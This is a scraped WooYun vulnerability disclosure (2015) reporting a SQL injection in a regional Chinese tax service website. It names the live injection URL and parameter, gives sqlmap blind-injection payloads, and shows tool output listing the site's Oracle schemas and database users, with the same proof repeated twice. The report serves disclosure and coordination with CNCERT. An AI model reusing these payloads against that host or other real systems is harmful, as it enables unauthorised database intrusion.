京津冀某服务网存在SQL注入漏洞 | wooyun-2015-0121048| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121048

漏洞标题：京津冀某服务网存在SQL注入漏洞

漏洞作者：指尖上的故事

提交时间：2015-06-17 16:34

修复时间：2015-08-06 09:58

公开时间：2015-08-06 09:58

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-06-17：细节已通知厂商并且等待厂商处理中
2015-06-22：厂商已经确认，细节仅向厂商公开
2015-07-02：细节向核心白帽子及相关领域专家公开
2015-07-12：细节向普通白帽子公开
2015-07-22：细节向实习白帽子公开
2015-08-06：细节向公众公开

简要描述：

京津冀综合税务服务网存在SQL注入漏洞
注入点：http://www.jjjtax.gov.cn/OneTreeServelt?qbdf_sw=1

详细说明：

Place: GET
Parameter: qbdf_sw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING claus
    Payload: qbdf_sw=1' AND 5500=5500 AND 'mWPE'='mWPE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: qbdf_sw=1' AND 953=DBMS_PIPE.RECEIVE_MESSAGE(
(105)||CHR(74),5) AND 'XYLu'='XYLu
---
[07:14:26] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, JSP
back-end DBMS: Oracle
[07:14:26] [WARNING] schema names are going to be used on
 as the counterpart to database names on other DBMSes
[07:14:26] [INFO] fetching database (schema) names
[07:14:26] [INFO] fetching number of databases
[07:14:26] [INFO] retrieved: 26
[07:14:36] [INFO] retrieved: BJSAT_JJJYTH
[07:15:58] [INFO] retrieved: CTXSYS
[07:16:46] [INFO] retrieved: HR
[07:17:04] [INFO] retrieved: MDSYS
[07:17:40] [INFO] retrieved: ODM
[07:18:04] [INFO] retrieved: ODM_MTR
[07:18:54] [INFO] retrieved: OE
[07:19:12] [INFO] retrieved: OLAPSYS
[07:20:13] [INFO] retrieved: ORDSYS
[07:21:15] [INFO] retrieved: OUTLN
[07:21:52] [INFO] retrieved: PM
[07:22:12] [INFO] retrieved: QS
[07:22:32] [INFO] retrieved: QS_CBADM
[07:23:30] [INFO] retrieved: QS_CS
[07:24:05] [INFO] retrieved: QS_ES
[07:24:43] [INFO] retrieved: QS_OS
[07:25:19] [INFO] retrieved: QS_WS
[07:25:57] [INFO] retrieved: RMAN
[07:26:27] [INFO] retrieved: SCOTT
[07:27:06] [INFO] retrieved: SH
[07:27:24] [INFO] retrieved: SYS
[07:27:48] [INFO] retrieved: SYSTEM
[07:28:30] [INFO] retrieved: TRSWCM
[07:29:24] [INFO] retrieved: WKSYS
[07:30:00] [INFO] retrieved: WMSYS
[07:30:39] [INFO] retrieved: XDB
available databases [26]:
[*] BJSAT_JJJYTH
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TRSWCM
[*] WKSYS
[*] WMSYS
[*] XDB

Place: GET
Parameter: qbdf_sw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: qbdf_sw=1' AND 5500=5500 AND 'mWPE'='mWPE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: qbdf_sw=1' AND 953=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(86)||CHR
(105)||CHR(74),5) AND 'XYLu'='XYLu
---
[07:40:44] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, JSP
back-end DBMS: Oracle
[07:40:44] [INFO] fetching database users
[07:40:44] [INFO] fetching number of database users
[07:40:44] [INFO] retrieved: 32
[07:40:52] [INFO] retrieved: SYS
[07:41:58] [INFO] retrieved: SYSTEM
[07:42:48] [INFO] retrieved: OUTLN
[07:43:26] [INFO] retrieved: DBSNMP
[07:44:01] [INFO] retrieved: WMSYS
[07:44:29] [INFO] retrieved: ORDSYS
[07:45:04] [INFO] retrieved: ORDPLUGINS
[07:45:57] [INFO] retrieved: MDSYS
[07:46:26] [INFO] retrieved: CTXSYS
[07:46:59] [INFO] retrieved: XDB
[07:47:18] [INFO] retrieved: ANONYMOUS
[07:48:08] [INFO] retrieved: WKSYS
[07:48:37] [INFO] retrieved: WKPROXY
[07:49:19] [INFO] retrieved: ODM
[07:49:39] [INFO] retrieved: ODM_MTR
[07:50:19] [INFO] retrieved: OLAPSYS
[07:50:59] [INFO] retrieved: BJSAT_JJJYTH
[07:52:26] [INFO] retrieved: RMAN
[07:52:49] [INFO] retrieved: HR
[07:53:03] [INFO] retrieved: OE
[07:53:17] [INFO] retrieved: PM
[07:53:38] [INFO] retrieved: SH
[07:53:52] [INFO] retrieved: QS_ADM
[07:54:25] [INFO] retrieved: QS
[07:54:38] [INFO] retrieved: QS_WS
[07:55:07] [INFO] retrieved: QS_ES
[07:55:44] [INFO] retrieved: QS_OS
[07:56:16] [INFO] retrieved: QS_CBADM
[07:57:01] [INFO] retrieved: QS_CB
[08:04:03] [INFO] retrieved: QS_CS
[08:04:32] [INFO] retrieved: SCOTT
[08:05:01] [INFO] retrieved: TRSWCM
database management system users [32]:
[*] ANONYMOUS
[*] BJSAT_JJJYTH
[*] CTXSYS
[*] DBSNMP
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TRSWCM
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[08:05:35] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.jjjtax.gov.cn'
[*] shutting down at: 08:05:35

漏洞证明：

Place: GET
Parameter: qbdf_sw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING claus
    Payload: qbdf_sw=1' AND 5500=5500 AND 'mWPE'='mWPE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: qbdf_sw=1' AND 953=DBMS_PIPE.RECEIVE_MESSAGE(
(105)||CHR(74),5) AND 'XYLu'='XYLu
---
[07:14:26] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, JSP
back-end DBMS: Oracle
[07:14:26] [WARNING] schema names are going to be used on
 as the counterpart to database names on other DBMSes
[07:14:26] [INFO] fetching database (schema) names
[07:14:26] [INFO] fetching number of databases
[07:14:26] [INFO] retrieved: 26
[07:14:36] [INFO] retrieved: BJSAT_JJJYTH
[07:15:58] [INFO] retrieved: CTXSYS
[07:16:46] [INFO] retrieved: HR
[07:17:04] [INFO] retrieved: MDSYS
[07:17:40] [INFO] retrieved: ODM
[07:18:04] [INFO] retrieved: ODM_MTR
[07:18:54] [INFO] retrieved: OE
[07:19:12] [INFO] retrieved: OLAPSYS
[07:20:13] [INFO] retrieved: ORDSYS
[07:21:15] [INFO] retrieved: OUTLN
[07:21:52] [INFO] retrieved: PM
[07:22:12] [INFO] retrieved: QS
[07:22:32] [INFO] retrieved: QS_CBADM
[07:23:30] [INFO] retrieved: QS_CS
[07:24:05] [INFO] retrieved: QS_ES
[07:24:43] [INFO] retrieved: QS_OS
[07:25:19] [INFO] retrieved: QS_WS
[07:25:57] [INFO] retrieved: RMAN
[07:26:27] [INFO] retrieved: SCOTT
[07:27:06] [INFO] retrieved: SH
[07:27:24] [INFO] retrieved: SYS
[07:27:48] [INFO] retrieved: SYSTEM
[07:28:30] [INFO] retrieved: TRSWCM
[07:29:24] [INFO] retrieved: WKSYS
[07:30:00] [INFO] retrieved: WMSYS
[07:30:39] [INFO] retrieved: XDB
available databases [26]:
[*] BJSAT_JJJYTH
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TRSWCM
[*] WKSYS
[*] WMSYS
[*] XDB

Place: GET
Parameter: qbdf_sw
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: qbdf_sw=1' AND 5500=5500 AND 'mWPE'='mWPE
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: qbdf_sw=1' AND 953=DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(86)||CHR
(105)||CHR(74),5) AND 'XYLu'='XYLu
---
[07:40:44] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, JSP
back-end DBMS: Oracle
[07:40:44] [INFO] fetching database users
[07:40:44] [INFO] fetching number of database users
[07:40:44] [INFO] retrieved: 32
[07:40:52] [INFO] retrieved: SYS
[07:41:58] [INFO] retrieved: SYSTEM
[07:42:48] [INFO] retrieved: OUTLN
[07:43:26] [INFO] retrieved: DBSNMP
[07:44:01] [INFO] retrieved: WMSYS
[07:44:29] [INFO] retrieved: ORDSYS
[07:45:04] [INFO] retrieved: ORDPLUGINS
[07:45:57] [INFO] retrieved: MDSYS
[07:46:26] [INFO] retrieved: CTXSYS
[07:46:59] [INFO] retrieved: XDB
[07:47:18] [INFO] retrieved: ANONYMOUS
[07:48:08] [INFO] retrieved: WKSYS
[07:48:37] [INFO] retrieved: WKPROXY
[07:49:19] [INFO] retrieved: ODM
[07:49:39] [INFO] retrieved: ODM_MTR
[07:50:19] [INFO] retrieved: OLAPSYS
[07:50:59] [INFO] retrieved: BJSAT_JJJYTH
[07:52:26] [INFO] retrieved: RMAN
[07:52:49] [INFO] retrieved: HR
[07:53:03] [INFO] retrieved: OE
[07:53:17] [INFO] retrieved: PM
[07:53:38] [INFO] retrieved: SH
[07:53:52] [INFO] retrieved: QS_ADM
[07:54:25] [INFO] retrieved: QS
[07:54:38] [INFO] retrieved: QS_WS
[07:55:07] [INFO] retrieved: QS_ES
[07:55:44] [INFO] retrieved: QS_OS
[07:56:16] [INFO] retrieved: QS_CBADM
[07:57:01] [INFO] retrieved: QS_CB
[08:04:03] [INFO] retrieved: QS_CS
[08:04:32] [INFO] retrieved: SCOTT
[08:05:01] [INFO] retrieved: TRSWCM
database management system users [32]:
[*] ANONYMOUS
[*] BJSAT_JJJYTH
[*] CTXSYS
[*] DBSNMP
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_ADM
[*] QS_CB
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] TRSWCM
[*] WKPROXY
[*] WKSYS
[*] WMSYS
[*] XDB
[08:05:35] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.jjjtax.gov.cn'
[*] shutting down at: 08:05:35

修复方案：

过滤

版权声明：转载请注明来源指尖上的故事@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-06-22 09:57

厂商回复：

cnvd确认并复现所述情况，转由cncert向北京市政府信息化主管部门通报，由其后续尝试协调网站管理单位处置。根据反馈情况，目前对方也不能确认网站管理单位，暂未建立联系渠道。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121048

漏洞标题：京津冀某服务网存在SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者：指尖上的故事

提交时间：2015-06-17 16:34

修复时间：2015-08-06 09:58

公开时间：2015-08-06 09:58

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源指尖上的故事@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0121048

漏洞标题：京津冀某服务网存在SQL注入漏洞

相关厂商：cncert国家互联网应急中心

漏洞作者： 指尖上的故事

提交时间：2015-06-17 16:34

修复时间：2015-08-06 09:58

公开时间：2015-08-06 09:58

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0121048"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 指尖上的故事@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：指尖上的故事

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源指尖上的故事@乌云